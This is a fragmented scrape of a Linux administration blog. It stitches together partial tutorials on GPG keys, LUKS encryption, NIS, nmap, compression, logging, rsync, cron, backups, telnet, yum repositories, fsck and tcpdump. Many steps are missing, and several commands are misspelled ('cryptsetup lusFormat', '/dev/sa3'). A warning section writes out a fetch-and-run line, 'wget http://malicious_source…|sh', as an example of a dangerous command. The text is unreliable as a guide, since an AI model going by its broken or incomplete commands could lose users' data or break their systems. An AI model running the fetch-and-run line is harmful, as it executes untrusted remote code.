does not support encryption? In this case you will have to manually encrypt your data and the
person that receives the data have to manually decrypt it
strong encryption that stood the test of time and has not been broken yet even based on
leaked reports,even government agencies are not able to break it yet,so its very very very strong
encryption
So let us have an example where we have two people Vasanth and Nirmal and we are
going to forget about how they are going to communicate ,if you want to know the remote login
and file transfer concept vist this link https://www.linuxvasanth.com/understanding-ssh-scp-
protocols-linux-operating-system/ and the content of the message is for example “very secret
data” now if vasanth wants to protect his message from anyone who might intercept this
message or read it, he can use an encryption key in order to encrypt this message and this
will transform the message in to gibbersh and then he can go ahead and send this message
to Nirmal using any method by sending it as an email or by post or by text message,it doesn’t
really a matter
And if this message gets intercepted the contents of this message is going to be gibberish,so
it wont be useful to a person who is intercepting this.
Nirmal will open the file,the message will still be gibberish ,and then Nirmal is going
to use the same encryption key to decrypt this message and reveal this content.
So very simple,basically vasanth uses a key to encrypt the message and Nirmal uses the same
key to decrypt it and this way they are both able to read the message,so the same key is used
by vasanth and nirmal,therfore this is called as an Symmetric encryption
So now probarbly guessed it by now,This key needs to be private.That’s why it is called as an
secret key because any body who manages to get his hands on this key they will be able to
decrypt any message that vasanth sends to nirmal ,So the secret key should be kept secret always.
But vasanth somehow has to share it with Nirmal and anyone else vasanth wants to
communicate with,therefore this is the major flaw with the Symmetric encryption because the
key has to be secret but at the same time has to be shared and sharing it with more people
increases the attack .
Learn Python Basics
How are we going to share it? Are we going to send it in a separate message? what if
that message gets intercepted? What if we are sending over the internet and we know how many
hubs our data could pass by this could be intercepted read and the rest of our
communication will be decrypted.
This was the main incentive to come up with a more secure encryption and this is where
asymmetric or public key encryption comes
Now lets us go back to the scenario again,vasanth wants to send message to nirmal and this time
So again i tell you the same,vasanth wants to send a message to nirmal,but before sending this
message and before encrypting it nirmal is going to create a key pair a public key and a
private key.
And nirmal will send the public key to vasanth to the person that will send the message,so
the public key can be shared it with anybody even you can also shared it public on the internet
on key directories,it doesn’t really a mater because it cannot be used to determine the private key
therefore it is completely safe to share the public key.
So now vasanth received the public key from nirmal,now vasanth uses this public key to encrypt
the message and he can send it to nirmal by using any method. Nirmal will receive the message
but still be gibberish but he will use the private key to decrypt the message and as i said the
private key was never shared.
Nirmal created the private key and he kept the private key,the only thing that is shared is
the public key which cannot be used to determine the private key and cant be used to
decrypt the message it can only be used to encrypt the message.
So by the end of the commnuication vasanth is going to have nirmal’s public key and nirmal is
going to keep their private key.
So the whole idea is very simple,you share your public key that is completely safe because it
cant be used to decrypt the data and anyone who wants to send you a message they will
encrypt that message with your own public key and this way you will be the only one that can
decrypt the message.
Now let me show you how to encrypt the message and then how nirmal will decrypt the
messsage.
Your selection? 1
Press “0” and enter
Key is valid for? (0) 0
Comment: datasecurity
In this Enter your name,email and comment details about this key
It will be ask you to confirm,press”O” and return
Now it will ask you to enter new password to protect your key
dav
https://www.linuxvasanth.com
generator a better chance to gain enough entropy.
3BC727974C78F9743583EE252450F11C2E4F14DB
uid asuren (datasecurity)
sub rsa4096 2020-07-25 [E]
That’s it we have successfully generated the key for encryption.
You can list the keys in your database key ring as follows
3BC727974C78F9743583EE252450F11C2E4F14DB
uid [ultimate] asuren (datasecurity) asuren@demomail.com
sub rsa4096 2020-07-25 [E]
As you can see from the above output the Public and private keys are created.
Let us Encrypt with GPG using Public Key
First create a file and add some contents,imagine this file holds some sensitive datas which
should not be shared it with anyone or with any untrustable persons,So after creating the file i
will encrypt the file with GPG.
#cat /mysecuredata
BANK CARD NUM:095349452
PASSWORD:123abc123abc
Now we have a file and this file is holding some sensitive details,let us encrypt the data as
follows
root@kali:/# ls
ap csk.sh mysecuredata
icc lrHXxKyd.jpeg mysecuredata.gpg
root@kali:/#
You will see two files now,the first one is the original source file and the second
one mysecuredata.gpg is the encrypted file.Now if you try to read the content you will get
gibberish as the file is encrypted,to read the content you will have to decrypt the file.
Now the last step is to encrypt with an ASCII encoding as follows
#gpg mysecuredata.asc
GPG will automtically find out who the file is encrypted for and checks to see if you are in
ownership of the private key and you will be prompted for your password
I hope you have enjoyed this article,If you have any queries you can put a comment in the
comment box
Kindly visit my YouTube Channel and if you are satisfied click here to
Subscribe
Click here to Subscribe linuxvasanth.com updates
1. Apache Web Server in RHEL Server » Vasanth Blog on Understanding SWAP
Memory(Virtual) in Linux Server.July 10, 2021
[…] Understanding SWAP Memory(Virtual) in Linux Server. […]
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
Let us Configure the disk encryption ,here i am going to show the encryption after installation
process get completed,I have an Linux server installed and its ready to do the setup….
1. dm_crypt modules
2. cryptsetup-luks rpm
Note:LUKS needs dm_crypt modules and cryptsetup-luks rpm
First Make sure both of these are already installed in my Linux server(I am using RHEL6.2)
https://www.linuxv
asanth.com
Note:As you can see from the above screen shot ,both the required modules are not
loaded,If it is not loaded by default then you can Load the modules manually with the command
“modprobe“,This is the command designed to run the modules manually,let load the modules
now as follows,
#modprobe dm_crypt
Now verify,
https://
www.linuxvasanth.com
As we have seen from the above output now both the modules are loaded successfully.
Now let us confirm whether the “cryptsetup-luks” rpm is installed or not with the below
command,
#rpm -qa cryptsetup-luks
https://www.linux
vasanth.com
As you have seen from the above output the cryptsetup-luks rpm is already installed
What is lsmod?
Is the command which is used to view the modules that are currently Loaded in the
Kernel.To more about lsmod command you can run the “man” command a follows
#man lsmod
Now before we start creating an encrypted disk partition filesystem,you will need a partition,any
partition methods you can use LVM,RAID,in this example i am gonna create a very simple
partition with the size of 200MB by using the fdisk method. If you don’t know how to create a
ht
tps://www/linuxvasanth.com
Now reboot the server to update the newly created paritions in the kernel memory
#reboot -f
https://www.linuxvasanth.com
So after reboot we have to format with the ext4 file system,in this example i am not going to do
this rather i use “dd” command to fill the partition with some random data as follow,
#dd if=/dev/urandom of=/dev/sda3 bs=1M
The above command will fill the entire partition size fully with the random data’s.
http
s://www.linuxvasanth.com/
As you can see from the above output ,the entire 200MB partition size s filled up with some
random data’s,the partition is now with no space left to store any data.Now we have to create a
password for the file system with the help of crypt setup command,when you run this command
it will ask you to type a new password and a confirmation,
#cryptsetup lusFormat /dev/sda3
https://www.linuxvasanth.com/
Note: Don’t type “yes” in lowercase when it is asking you for the confirmation,if you do then
the disk will not encrypted,So type “YES” in uppercase.
Hi Visit my YouTube Channel and Subscribe ,Kindly Support me to do more
tutorials https://www.youtube.com/channel/UC6bR8In-jj9-
klVlZQ6YH_A
Now we have successfully encrypted the partition ,Remember once you have generated partition
and created the encryption on that it will be available under the path /dev/mapper directory,You
will have to give a new label name and this label name will show up below the /dev/mapper path.
#cryptsetup luksOpen /dev/sa3 safe_mydata
https://www.linuxvasanth.com/
Note:safe_mydata i the label name which will store under /dev/mapper path
#ls /dev/mapper
https://www.linuxvasanth.com/
As you can see from the above output,the label name safe_mydata has been successfully created
under the /dev/mapper path
Now to make it writable we will need to create a new file system on the partition,let us create a
new file system on the partition as follows,
#mkfs.ext4 /dev/maper/safe_mydata
https://
www.linuxvasanth.com/
We have successfully created the new filesystem on the partiton,now we need to add the entry in
the /etc/fstab and /etc/crypttab file,so that it will be avaiable after reboot the server
Now open the file with the vi editor as follows,
#vi /etc/crypttab
safe_mydata /dev/sda3
Just add the name of the encrypted device and its path in the above file.
https://www.linuxvasanth.com/
Verify with the help of cat command after adding the entries,
#cat /etc/crypttab
https://www.linuxvasanth.
com/
Everything is perfect,now create a mount point and add its entry in the /etc/fstab file,so that
when the server next rebooted or powered on this partition will get auto mounted.
#mkdir /safe_mydata
#vi /etc/fstab
Add the following entries inside the file,
https
://www.linuxvasanth.com/
Perfect!!!! We have done it,now run the mount command with -a option to update all the
partitions in fstab file
#mount -a
https://www.linuxvasanth.com/
Now on the next reboot the system will ask you for the password,type the password to
unlock the partition,you can only access the partition with the correct password,
https://www.linuxvasanth.com/
After giving the correct password verify the partition by accessing its mount point directory as
shown below in the screen shot
https://www.linuxvasanth.com/
How to Verify if a Hard drive is encrypted on Linux?
Here we have a drive /dev/sda,and the partition you want to check is /dev/sda3,then run the
following command
Click here to Watch LUKS on YouTube
Channel
#blkid /dev/sda3
Note:The output will change if the partition is encrypted,if not encrypted it will show the type of
file system the partition is using
http
s://www.linuxvasanth.com/
As you can see from the above screen shot,I have checked it with two partitions,/dev/sda3 is
encrypted with LUKS and /dev/sda2 is not the encrypted partition that’s why it is showing
its file system type ext4.
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
As all we know in Linux all the services running on the server is listening to the socket for client
to make the connection request.After the successful connection from the client one socket (i.e
port and IP address combination) is generated
To fetch the full details regarding port status,IP in Linux more commands are available like “net-
stat”,tcpdump to get the port details,To get the Socket details in easiest way we use the command
called “ss”(Socket) ,this command will open the network socket related details on a Linux
Server.
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
ypserv
ypbind
nfs
make
xinetd
cache
https://www.linuxvasanth.co
m
Now its time to check the follwing services are in online
nfs
ypserv
yppasswdd
ypbind
xinetd
#setup
https://www.linuxvasanth.com
then choose the system services and activate the above services
https://www.linuxvasanth.com
Open the /etc/sysconfig/network file
https://www.linuxvasant
h.com
update the hostname and NIS domain name as follows and save it
https://www.linuxvasanth.com
Now create a user with the name user1 and set /rhome as the default home directory with full
permission.
https://www.linuxvasanth.com
https://www.linuxv
asanth.com https://www.linuxvasanth.com
https://www.linuxvasanth.com
now open the /etc/exports nfs file and set the following details
https://www.linuxvasanth.com
locate the line number 117 and remove the other entry from this lines
expect passwd,group,hosts,netid \
https://www.linuxvasanth.com
Use the option ESC +: set nu to display the line numbers
save the file and exit
https://www.linuxvasanth.com
https://www.linuxvasanth.com
once you have updated restart all the services once again to take effect and also make all the
services to online upon next reboot with the help of chkconfig command
service xinetd restart
service nfs restart
service ypserv restart
service yppasswdd restart
service ypbind restart
chkconfig xinetd on
chkconfig nfs on
chkconfig ypserv on
chkconfig ypbind on
chkconfig yppasswdd on
thats it we have done with the NIS server configuration ,next we need to set up the NIS client as
follows.
First check the connectivity between the Server and Client before you start doing the
configuration,try to Login in to NIS Server from telnet,if the connection is successful via telnet
then mount /rhome/user1 directory via nfs server.
If you have got no error on the above test then start doing the client side configurations.
https://www.linuxvasanth.com
Now edit the /etc/sysconfig/network file as follows
https://www.linuxvasanth.c
om https://www.linuxvasanth.com
save the file and quit
Then run the setup command and choose authentication configuration from the options
https://www.linuxvasanth.com
https://www.
linuxvasanth.com
now mark nis and choose the next option
https://www.linuxvasanth.com
then set the domain name to rhce and server 192.168.56.101
https://www.linuxvasanth.com
After selecting the ok option it has to show the following output without any error
https://www.linuxvasanth.com
if you get any error then try check the configuration from the beginning
https://www.linuxvasanth.com
at the end of the file add the following entries
/rhome /etc/auto.misc
Auto master: To automatically mount any file systems on demand as and when you access
them not only it will mount automatically but it can automatically unmount the file system
when not in use for a mentioned predefined timeout value.
Syntax will look like this
mount-point map-name options
https://www.linuxvasanth.com
save the file and exit
https://www.linuxvasanth.com
save and quit
Syntax for auto.misc file is
mount-point option location
#chkconfig autofs on
#chkconfig ypbind on
Now restart the system
#init 6
After reboot Login with the username “user1” on client system
after logged on check the current path with pwd,it has to show /rhome/user1
#telnet 192.168.56.156
https://www.linuxvasanth.com
That’s all from NIS ,Stay Tuned for More Updates
1. Apache Web Server in RHEL Server » Vasanth Blog on Understanding SWAP
Memory(Virtual) in Linux Server.July 10, 2021
[…] Understanding SWAP Memory(Virtual) in Linux Server. […]
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
I will be covering some of the important Nmap usages,Here in this example i have used two
Linux servers without enabling the firewall to test the working of nmap command.
https://www.linuxvasanth.com
Ex:2 To scan using Verbose Option “-v”
#nmap -v 192.168.1.144
You can see now the below command with -v option will give you the detailed report
https://www.linuxvasanth.com
#nmap 192.168.1.*
Ex:4 To scan list of Hosts from a file
For example if you have more hosts to scan then all the hosts details are copied in a file,you can
directly ask the nmap to read the file to scan the hosts
Let me create a file “myhost.txt” and mention all the host name and IP address of the server to
do the scan
#cat >/myhost.txt
192.168.1.6
productionserver
linuxvasanth.com
www.linuxvasanth.co
m
Now run the nmap command with the -iL option to scan all the listed IP in the file
www.linuxvasanth.com
#nmap -A 192.168.1.144
www.linuxvasanth.com
As you can see from the output nmap came up with the TCP/IP finger print of the OS running
on the remote server and more about the ports and services running on the remote server.
That’s it with Nmap for now,Stay tuned with us and don’t forget to share and comment
your feedback
Kindly Subscribe my Youtube Channel and support me
Apache Web Server in RHEL
Understanding SWAP Memory(Virtual) in Linux Server.
What is KERNEL Program?
How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver
What is Systemd(systemctl) Dameon in RHEL 7/RHEL 6
Leave a comment RHEL Networking Linux, Network tool, nmap, trace route 16 Jan
2020 VASANTH NIRMAL
How to Compress a
file/directory data in Linux?
28 Oct 2019 VASANTH NIRMAL
The most commonly used commands in Linux for compressing a file is zip and unzip .These
tools are installed by default in many latest Linux distributions.
Zip command to compress a file data
UNZIP command to decompress a file
Zip file(Compress)
Compressed files uses less disk space than the normal files ,the compressed files replaces
the original file with the new file that has an additional extension with .zip
Ex:1 To Compress a file
Syntax
https://www.linuxvasanth.com
Ex:2 To compress a Directory and all its contents
When you are compressing a entire folder then you must have to apply the recursive option with
the zip command as follows
Syntax
#mkdir /data
#touch /data/logs
#touch /data/bank
#mkdir /data/mydirectorey
#mkdir /data/folder
If you run without -r option then the zip command will try to compress only the files not the
directory
https://www.linuxvas
anth.com
As you can see from the above output the zip command did not compress the directory,now run
the same command with -r option and check
https://w
ww.linuxvasanth.com
As you can see from the above output .zip command successfully compressed the entire
directory,“deflated indicates the compression ratio” and “stored 0%” means its ab empty sub
directory,inside that no contents available .
To check the zip file
#ls
https://www.linuxvasanth.com
Ex:3 To unzip(extract) a file
Syntax to unzip
https://www.linuxvasanth.com
The above command extract in the current directory path,if there are the original files,then it will
ask you to replace it.
To unzip a directory
#unzip project.zip
https://www.linuxvasanth.com
Ex:4 To compress all files in your current directory
In this example i have a directory with the name “tnp” which is having some data’s inside
#zip tape.zip *
Here “*” will select all the files alone from my current path “tnp”
https://www.linuxvasanth.com
Ex:5 To unextract in different directory path
Syntax
https://www.li
nuxvasanth.com
Ex:6 See the content of the zip file without decompressing
You can see the content of a zip file with unzip -l command as follows
#unzip -l project.zip
The above command will list the contents from the zip file called “project.zip”
https://www.linuxvasanth.com
Ex:8 To Exclude a certain file during decompression
As we are able to extract the files,it is possible to exclude certain files during decompression
Syntax:
https://www.linuxvasanth.com
Ex:10 To Print the details info about the compressed file
It is possible to print the details from the compressed file like ls -l
3. Apache Web Server in RHEL Server » Vasanth Blog on How to install the packages in
Redhat Linux?July 10, 2021
4. Apache Web Server in RHEL Server » Vasanth Blog on How to Configure Local Yum
Repository Server using ISO in RHEL 7.0 VerJuly 10, 2021
[…] How to Configure Local Yum Repository Server using ISO in RHEL 7.0 Ver […]
Maintaining a secure server is keeping tracking of the issues that take place on the server,if you
really know what usually happens such as knowing when users log in to the system ,you can
apply log files to spot the actitvity. You can configure “syslogd” records through
the /etc/rsyslog.conf file .
syslogd daemon manages all the logs on your server and coordinates with any of the
logging operations of other servers on your network.The entrie confiuration informations
for syslogd daemon is saved in /etc/rsyslog.conf file which contains the names and locations
for your syslog files.
Note:By default system accepts logs only from the local host,In this example we will
configure a log server and accept logs from the client system.
In this example i have two servers Linux server and Linux client systems
#vi /etc/rsyslog.conf
Client system can be configured to send logs via TCP and UDP protocols,both are show below
On client system open the rsyslog.conf file and enter the name and port of the centralized rsyslog
server details
https://www.linuxvasanth.com
Now restart the client system so it could send the log entry to the rsyslog server
Note:These Logs will generate only when the client boot,so do reboot not shutdown.
On Linux client
#reboot -f
The main advantage of rsync command is it copies only the updates blocks or bytes to the
destination path.
When you run rsync for the first time it copies the entire bytes to the destination path (like scp )
but when from the next time on wards it copies only the updated bytes or blocks to the
destination path.
One of the important feature of rsync tool is it uses “Delta transfer algorithm” which means it
will only copy or sync the changes from the source to the destination instead of copying the
entire content from the source which reduces utilizing the bandwidth over network.
Note:rsync is faster than scp command as it uses compression and
decompression method to sync
Basic syntax to run rsync command
rsync option source destination
Options:
-v = Verbose output
Note:If the destination file is not present already then rsync will create a new one,In the above
syntax i haven’t created the iob file before.
linuxvasanth.com/rsync
Ex:2 Copy a Dir from Local server to Remote server
In this example i will sync a directory from local server to remote server,on your local server the
dir called “bank” which will contain some rpm files and you want that local directory content to
be sync with the remote server
#rsync -avz /bank root@192.168.1.79:/repo
www.linuxvasanth.com/rsync
Subscribe
to our
email https://linuxvasanth.us17.list-manage.com/subscribe?
Updates u=88d7bc4e6f0dfbbd42369eab4&id=2546f9ba11
Subscribe
to our
YouTube
Channel: https://www.youtube.com/channel/UC6bR8In-jj9-klVlZQ6YH_A
Follow
My
Facebook
Page https://www.facebook.com/redhatvasanth/
1 Comment RHEL Networking 24 Jul 2019 VASANTH NIRMAL
We can use Cron to schedule automatic task at pre-determined times or intervals.Such process
can be scheduled and run automatically in the background without manual intervene by using the
cron daemon in Linux or UNIX Operating system.
You can autmate process like backup,scheduled updates and sync files etc.Cron is a daemon to
run shedule task.Cron checks every minute and checks the task in cront table.
Crontab means Cron table where we can schedule the repeated tasks.
Crontab file consists of six fields and separated either by space or tab,The beginning five fields
represents the time to run the tasks and the last field is for command
1)Minutes range:0-59
2)Hours range:0-23
3)Days range:0-31
4)Months range:0-12
Note: Cron uses some operators which will allow you to specify different values in a filed.
1)Asterisk(*):Specifies all possible values for a field
2)Comma(,):Specifies list of values
3)Dash(-):Specifies range of values
4)Separator(/):Specifies a step value
Ex:1 Create a Cron job
Task:Print the content from the Secure log file daily 4:00 pm
#date
#crontab -e
run the cat /var/log/secure file daily at 10:55
Ex:2 To check the scheduled Cron jobs:
#crontab -l
#crontab -r
This will remove all the scheduled jobs from cron table
-i option prompt you confirmation from a user before deleting the using cron job’s
Ex:6 To schedule a cron job for specific time
This job is to delete the empty files and directory from /tmp at 1:30 am daily.You will need to
mention user name to run crontab command ,Here in this example root user is performing the job
#crontab -e
vasanth
joel
vijay
rohit
In the below entry the user “valencia” is not listed,even though a user valencia is not listed
in cron.allow file,he can still run as that user.The cron.allow file controls the administrative
access to the crontab command for scheduling and editing the cron jobs.If the user valencia is
listed in cron.deny file then he will not allow to run the cron jobs.
******************************************************************************
***************************************************
******************************************************************************
******************************************************
5.wget http://malicious_source-0-|sh
The above command will download a script from a malicious source and then execute it. wget
command will download the script and sh will execute the script
You should be aware when your are downloading a package from unknown resources,use the
scripts and packages which is downloaded from trusted source.
WARNING: Don’t execute any of the above command on Linux terminal or your office
server.If you want to test run them in virtual machine .
Any data loss due to the execution of the above command will break your system down ,the author of the
article /linuxvasanth.com will not be responsible .
******************************************************************************
***************************************************
******************************************************************************
******************************************************
dump = This command would captures the data files and the same could be restored with the help of
"restore" command.
Let me show you how to take a root file system full back in Linux.
Before that always remember you will need to switch to the run-level-1 single user mode to
take the root file system backup,Linux will not allow you to take the root file-system backup
in run-level-3/5.
You can take the backup of the file system other than “/” either from run-level-3 or run-level-
5.
Setup Environment:
Oracle VM has got 2 hard-drives-sda&sdb,The main root file-system in installed
on /dev/sda1 partition as shown below ,
Note: I will be using the other drive /dev/sdb1 Partition used to store the disk dump i.e the backup data.
Now i will take the /dev/sda1 disk partition backup using the “dump” command where the root
file system resides, and it stores the dump in /dev/sdb1 partition.
Always remember to take root file system backup it should be done in single user
mode,Other partitions could be done either in run-level 3 or 5 .
Check the currently mounted partition details
#df -h
As you can see from the above output /dev/sda1 is mounted under “/” and /dev/sdb1 is
mounted under /mnt path
Now Let me bring down my server to Run-level-1 (Single user mode) to take the root file system
full backup.
#init 1
The above command will put the server in single user mode.
Once logged in to single user mode verify the current run-level by using the following command
#who -r
Now take the root file system full back using the dump command
After executing it will start dumping the data in to /dev/sdb1 disk as shown below
Once it has successfully dumped all the data, you will get the below message on your terminal
/etc/dumpdates=This file holds the file system backup information’s along with the type of
backup taken
Let me check the backup information by using the cat command
#cat /etc/dumpdates
Thats it!!!!!!
******************************************************************************
***************************************************
******************************************************************************
******************************************************
2.Telnet-client
Telnet-server:This Packages is installed on the Remote system.You should configure it
manually before the client can access/connect it.
Telnet-Client:This software allows you to connect to the Telnet server.After the client
establishes the connection to the remote system,client becomes the virtual terminal it allows you
to communicate with the remote system from your system.
TELNET uses the Port Number 23
Disadvantages of Telnet:
1.Direct “root” user Login is not Allowed in Telnet
3.It uses Plain text while transmitting the data over the connection.
Now on Client Machine also you need to do the above process,once you have successfully done
the configuration on the client machine ,now its time to connect to the remote system as follows.
As you can see from the above output , you must Login with the non-root user account first(coz
telnet will not allow you to login directly with “root” user account)
That’s it Done!!!!!!!
Click here to check SSH AND SCP Protocols in Detail Understanding SSH & SCP Protocols
in Linux Server
Click here to check how to configure SFTP Server Uploading and Downloading data’s with
SFTP Protocol
******************************************************************************
***************************************************
******************************************************************************
******************************************************
3. Yum will check and install all the dependencies packages automatically.
4. Yum is capable of tracking the dependencies of packages and installing them prior to
installing the package that the client needs to install
1.vsfstpd
2.deltarpm
3.python-deltarpm
4.createrepo
Check whether it is already installed or not by using the below command
#rpm -qa vsftpd*
#rpm -qa createrepo*
If the above packages are not installed already then install it with the help of rpm command as
follows
#rpm -ivh createrepo
Let us insert the installation disk and mount it, in Linux by default the disks are mounted
under /media directory path.
Step:1 Create a Directory
#mkdir /red
This Directory would be used to store all RPM Packages from Disk, here we will
use /red directory.
Now copy all the .rpm Packages from the installation disk to the /red directory.
During this process, many cache files will generate you should clear them after the configuration
is completed.
As we know yum uses Repository configuration file to check the available Repositories, now let
us create a necessary Repository configuration file for our Local Repository.
#vi /etc/yum.repos.d/data.repo
[linuxvasanth]
name=Yum Repository
baseurl=file:///red/Packages
enabled=1
gpgcheck=1
gpgkey=file:///red/RPM-GPG-KEY-redhat-release
:wq
[linuxvasanth]=Label of Repository, as we know repository configuration files are saved in /etc/yum.repos.d path,
The repository file holds configuration file for multiple repositories. This label is used as the identifier for the
repositories.
name=Is used to assign the name of the repository
enabled=1 It shows the state of the repository, Numeric value "1" means repository is enabled and "2" means
repository is disabled
gpgcheck=1 It defines the integrity of the package should be check or not, value "1" means integrity should
check and "0" means integrity should not check
#yum repolist
As you can see from the above output it shows the available Repositories ,since we have only
one repository (my yum server) it shows that one here
To List all the Installed Packages by using the “yum” command
#yum list installed |more
As you can see the above output ,it displays all the installed packages along with details.
To Display only the total Numeric count of all Installed
Packages
#yum list installed |wc -l
The above syntax displays only the total count of all installed packages instead of displaying all
the packages along with the details.
To Uninstall a Package:
To uninstall a package run the following syntax
******************************************************************************
******************************************************
umask(User File Creation Mask) which is used to control the permissions assigned for the files
and directories.
To change the runlvel you will need to edit the “/etc/inittab” file and change the default init
entry “id:5:initdefault
You can switch to different run-levels with the help of “init” command followed by the run-level
number (init 3)
#df -h
#df -h
As you can see from the above output now tmpfs size has been extended to 4G
In the above output ,“N” indicates the run-level has not been changed since the system was
booted.“3” is the current run-level
Video Player
00:00
00:00
To change the default Run-level
/etc/inittab file holds the default run-level entry,open this file with the vi editor and change the
run-level number to your desired one as follows,
Here am going to change the run-level from 3 to run-level 5
#vi /etc/inittab
Modify the line as follows
remove 5 and add 3 in the above line,after update reboot the system to login n to the new run-
level
To reboot use the following command
#init 6
I hope you find this guide useful
More good stuffs to come,Stay tuned!!!!
Mail me your queries to vasanth@linuxvasanth.com
#############################################################
If you found this article useful, Kindly Subscribe here Click this link to Subscribe
##############################################################################
##
Understanding tar(Tape
Archive) command in Linux
14 Dec 2018 VASANTH NIRMAL
tar(Tape Archive) is used to group multiple files in to a single archive file.An Archive file it
consists of any number of different files and also it contains the details to allow them to restored
to their original format.Archive files are more easier to transmit or upload to the destination drive
or media.
tar program first originally developed for the backups on the magnetic tape drive,later it can
be now used to create archive files on a file system.tar will not compress the size of the data ‘s
,but it is very easy to compress the archive files created with tar utility.
Basic syntax for “tar”:
#tar <options> <archive file> <files to be archive>
Let us see the available options that can be used with the tar command
-c = To create a new archive file(with the extension .tar)
-v = Verbose Output
#ls
As you can see from the above output ,the archived file with the name backup.tar is created
successfully.
Ex:2 Untar the archive file
##If you want to unarchive in your current path run the below syntax
##If you want to unarchive in different path run the below syntax
#cd /home/vasanth
#ls
As you can see from the above output ,all the files from the archive successfully unarchived
The above command will not unarchive the archive file,it just list the content from the archive
file.
Note: To delete multiple files ,add space and give the file names
To confirm whether it is removed from the archive file
Thank you
You can reach me at vasanth@linuxvasanth.com
#############################################################
If you found this article useful, Kindly Subscribe here Click this link to Subscribe
##############################################################################
##
Understanding “fsck” in
Linux
4 Dec 2018 VASANTH NIRMAL
Importance of FSCK Utility
No one can predict when the system will get crash or your filesystem gets corrupt and if it
happens then you may lose all of your valuable data from your hard drive. If you found that your
filesystem creates such inconsistency then it is always run fsck to check the integrity, and this
can be completed by using the special command called “fsck”(Filesystem consistency
check). You can run this command manually or can start at the boot times.
You will need to run “fsck” on the following situation occurs
1.Taking a backup of your filesystem
2. Files on your system become corrupt
3. To do the consistency check
Ex:1 To run fsck on the filesystem
Syntax:
#fsck <filesystem> or fsck <mount point dir>
Note: To run fsck on a filesystem, the filesystem should be in the unmounted state and
inactive, You should never run fsck on the mounted partition doing so would corrupt the
filesystem.
First check the filesystem is in mounted or in the unmounted state by using the following
command
#df -h
As you can see from the above output,/dev/sda2 is in the mounted state, now unmount this
filesystem by using the following command
#umount /dev/sda2
#df -h
#fsck /dev/sda2
As you can see from the output, fsck hasn’t found any errors from the /dev/sda2 filesystem.
To Repair the Linux Filesystems errors automatically
When the filesystems have more than one errors, then for each and every scan fsck will ask the
confirmation before it proceeds to repair all the errors, apply -y option with the fsck command to
do the check and repair automatically.
#fsck -y /dev/sda2
16 = syntax error
#fsck /dev/sda2
#echo $?
The above command will produce some error code after the execution of fsck command
As you can see from the above output echo $? command produced “0” error code which says
there is no error found on the fsck scan.
#fsck -M
To run a fsck check on all the available partitions
To do a filesystem check on all partitions(including root partition), run the following command
with -A option
#fsck -A
I hope you have enjoyed this tutorial if so Kindly subscribe and share it with
your friends.
Thank you
You can reach me at vasanth@linuxvasanth.com
#############################################################
If you found this article useful, Kindly Subscribe here Click this link to Subscribe
##############################################################################
##
Step:19 Welcome Screen
After the installation, you will get the welcome screen, choose “forward” to continue
Step:20 Software updates
From this screen, you can install the updates or if you want to install the updates later you will
have the options to select that
Step:20 Create a Non-root user account
You should create a non-root user account ,This account will be used for all non-administration
tasks
Step:21 Setup Date and Time
Check that you have the correct date and time . You may also specify to syncrnoize your time
with a time server over the network. In real envirnonment, many organazations will use sepreate
time servers for this functionallty.
Step:22 Kdump
kdump is used to collect the server information after a server crash. You will need to give the
double the size of the RAM for this configuration
Step:23 Login Screen
At this login screen, you will need to choose the user account to log in, choose others and give
“root” at the username field to log in to the server as a root user.
I hope you have enjoyed this tutorial, if so Kindly subscribe and share it with
your friends.
Thank you
#############################################################
If you found this article useful, Kindly Subscribe here Click this link to Subscribe
##############################################################################
##
Leave a comment RHEL(Red Hat Enterprise Linux) Installation, Redhat installation, rhel
installation, rhel6 installation, step by step installation 22 Nov 2018 VASANTH NIRMAL
Monitoring Commands in
RedHat Linux Servers
17 Nov 2018 VASANTH NIRMAL
Important Monitoring commands in Linux
For a system and network administrator, it’s very tough to debug and monitor the Linux servers
activities and performance daily. In this tutorial, I have compiled some important monitoring
commands that might be useful for the Linux/UNIX administrators. All these commands are
available under all flavors of UNIX and these commands are very much useful in probing the
cause for the errors.
1.vmstat(Virtual Memory Statistics):
This command will display the statistics of virtual memory, CPU activity, IO Blocks, Kernel
threads and many more.
Some Linux distribution will not be having this command by default, You will need to install
the systat package which contains the vmstat command.
#vmstat
From the above output,t it showing the long listing of open files
DIR =Directory
REG = Regular file
To learn more about “lsof” command visit this link Importance of lsof command
Cancel the program by pressing ctrl+c, you will see the below output,
Note: This command saves the output in "pcap" format which can be viewed only by the "tcpdump"
command
7. To capture only “N” number of packets:
By default the “tcpdump” command captures all the packets for the specified interface until you
cancel the program, now by using one special option “-c” you can capture the specified number
of packets.
Below example captures only 4 packets
8. To check the Number of Interfaces in you Server, run the following command
#tcpdump -D
8.To capture and save the Packets in a File:
#tcpdump -w mylog.pcap -i eth0
Thank you
#############################################################
Step:5 Network type
If you want to access the system over the network in Rescue mode you can configure it from
here. Mostly in the rescue mode network configuration are unnecessary.
Step:6 Next, a screen will appear telling you that the program now will attempt
to find the RedHat Linux installation to rescue, choose “select” and enter
Step:7 Now you are in Rescue mode, if you grant it, then your root filesystem is
mounted under the /mnt/sysimage directory, for example, all you files will be
mounted under this location,your /etc/inittab file will get mounted
under /mnt/sysimage/etc/inittab.
Once it is mounted under the /mnt/sysimage you will get the below confirmation on your screen
Step:8 Start the resuce mode shell and enter
Run the below command after entering in to the command line mode
#chroot /mnt/sysimage
After this, you can open the system files to make the neccessary changes to make it function
properly.
